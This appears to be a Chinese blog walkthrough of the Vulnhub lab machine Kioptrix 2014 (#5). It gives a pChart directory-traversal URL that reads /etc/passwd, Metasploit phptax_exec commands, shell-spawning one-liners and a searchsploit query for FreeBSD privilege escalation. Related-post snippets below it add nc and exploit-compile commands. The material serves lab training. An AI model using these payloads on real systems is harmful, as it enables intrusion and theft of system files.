vulhub——Kioptrix: 2014 (#5)[freebsd系统]

最新推荐文章于 2024-04-14 01:10:24 发布
最新推荐文章于 2024-04-14 01:10:24 发布
阅读量230 收藏
点赞数
分类专栏: 安全测试:web\app\工具 文章标签: 信息安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43650289/article/details/106903089
版权

目录

 

信息收集

        PChart

文件包含

目录遍历漏洞

MSF

提权

信息收集

        PChart

文件包含

尝试利用漏洞,http://192.168.190.190/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

目录遍历漏洞

由于这个系统是freebsd,所以可以知道apache的位置

该系统对应的配置文件目录/usr/local/etc/apache22/httpd.conf

https://github.com/d34dfr4m3/kioptrix_l5_xpl

 

 

MSF

exploit/multi/http/phptax_exec

set rhosts 192.168.190.190

set rport 8080

exploit

提权

python -c ‘import pty; pty.spawn(“/bin/bash”)’
echo os.system('/bin/bash')
/bin/sh -i
 
searchsploit freebsd 9 | grep Privilege
 

 

 

战神/calmness
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机系列:Kioptrix: 2014 (#5)
汗的博客
04-06 1206
这次的靶机是Vulnhub靶机: 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-2014-5,62/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
Vulhub靶场 --- Kioptrix Level 1
m0_52072483的博客
01-26 139
Vulhub靶场 — Kioptrix Level 1 nmap扫描端口信息 dirb扫描目录 访问结果的目录 使用nikto扫描 访问test.php 查找mod_ssl是否有可利用的漏洞 searchsploit -m 47080.c apt-get install libssl-dev gcc -o OpenFuck 47080.c -lcrypto ...
Vulnhub靶机:Kioptrix_2014
qq_48904485的博客
03-19 543
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix: 2014(192.168.56.108)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
Vulnhub靶机:Kioptrix_2014,2024年最新网络安全面试真题精选
最新发布
2401_83947353的博客
04-14 502
运行环境:Virtualbox和vmware攻击机:kali(192.168.56.101)靶机:Kioptrix: 2014(192.168.56.108)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
Kioptrix 2014 (#5)
MD@@nr丫卡uer
12-11 505
目标:Kioptrix 2014 (#5) 攻击机:kali(192.168.1.107) 网关:192.168.1.255 #1端口探测 nmap 192.168.1.159 -O -sV -sS -O 系统探测 -sV 探测开启的端口来获取服务、版本信息 -sS 使用SYN扫描 #2访问80和8080端口 查看网页源代码 访问 http://192.168.1.159/pChart2.1.3/examples/index.php 找一下Navigation漏.
VulnHub-Kioptrix2014(#5)
热门推荐
江左盟的博客
07-21 1万+
信息收集 是 啊 啊 啊
Vulhub靶场-KIOPTRIX: LEVEL 1.1
B_l_a_nk的博客
11-19 314
万能秘密,命令执行,内核漏洞提权
vulhub——Kioptrix: Level 1 (#1)
战神/calmness的博客
06-04 288
下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 目标地址:192.168.243.37 攻击地址:192.168.18.148 目录 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 信息收集 MSF 建立连接 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh..
iohyve:利用ZFS的FreeBSD bhyve管理器
02-05
iohyve是一款基于FreeBSD操作系统的虚拟化管理工具,它充分利用了ZFS文件系统的特性,为用户提供了一种高效、安全的bhyve虚拟机管理体验。bhyve是FreeBSD内建的轻量级虚拟化技术,类似于Linux的KVM。而ZFS则是一款...
Jailer:Docker 类似于 FreeBSD 监狱的容器监狱管理
05-30
Jailer 的目标是解决 Docker 在 Linux 上解决的相同问题,但适用于 FreeBSD。 想象一个项目,在您已经存在的Dockerfile旁边有一个Jailerfile ,它可以用来启动一个运行已安装和配置的应用程序的 FreeBSD jail。 ...
FreeBSD系统编程.doc
02-21
FreeBSD系统编程是针对FreeBSD操作系统进行应用程序开发和系统维护的技术。在FreeBSD中,`make`是一个核心的工具,用于管理和构建项目,特别是跟踪文件之间的依赖关系,以自动化构建过程。以下是关于FreeBSD系统编程...
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
FreeBSD系统还原点设置.docx
04-30
**FreeBSD系统还原点设置** 在FreeBSD操作系统中,系统还原点是一种实用功能,它允许用户在特定时间点创建一个系统状态的快照,以便在出现数据丢失或系统故障时能够快速恢复。FreeBSD的这一特性对于那些需要高度...
Vulhub靶场 --- Kioptrix: Level 1.3 (#4)
m0_52072483的博客
01-28 220
Vulhub靶场 — Kioptrix: Level 1.3 (#4) 目录Vulhub靶场 --- Kioptrix: Level 1.3 (#4)1、信息搜集2、getshell3、提权 1、信息搜集 dirb nmap nmap -sV -O -p- 192.168.76.37 wapplayzer 2、getshell 已知为源码为PHP,测试万能密码 username:xxx password:1' or 1='1-- 在john目录有john.php文件,打开看看 此处有
vulnhub-Kioptrix: 2014 (#5) (考点:pchart/Apache/user-agent/phptax/perl)不用msf
冬萍子癸水
04-14 451
http://192.168.189.165/pChart2.1.3/examples/index.php?Action=View&Script=%2f…%2f…%2f%2f…%2f…%2fusr/local/etc/apache22/httpd.conf
vulnhub-Kioptrix2014靶场
shulao2010的博客
05-26 364
通过靶场看陈旧系统以及防范意识不足导致的公司核心资产如何收到攻击
OSCP-Kioptrix2014-2 漏洞利用
weixin_30383279的博客
06-28 361
pChart 2.1.3 文件包含漏洞 搜索漏洞 查看漏洞理由代码: hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd 之前的8080端口禁止访问,看看apache的配置: http://192.168.1.78/pChart2.1.3/examples/...
Kioptrix 2014靶场攻略
cht6667的博客
02-24 1140
打靶遇到的一下问题和搜获的记录,希望对你有帮助
OSCP-Kioptrix2014-3 后渗透测试
weixin_30316097的博客
06-28 228
拿到root权限 之前的努力,最终获得了两个session 尝试看看该操作系统的漏洞 kali: searchsploit freebsd 9.0 cp /usr/share/exploitdb/exploits/freebsd/local/28718.c ./Desktop/ cd Desktop/ nc -lp 5656 < 28718.c -q 1 msf ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

战神/calmness

你的鼓励是我最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值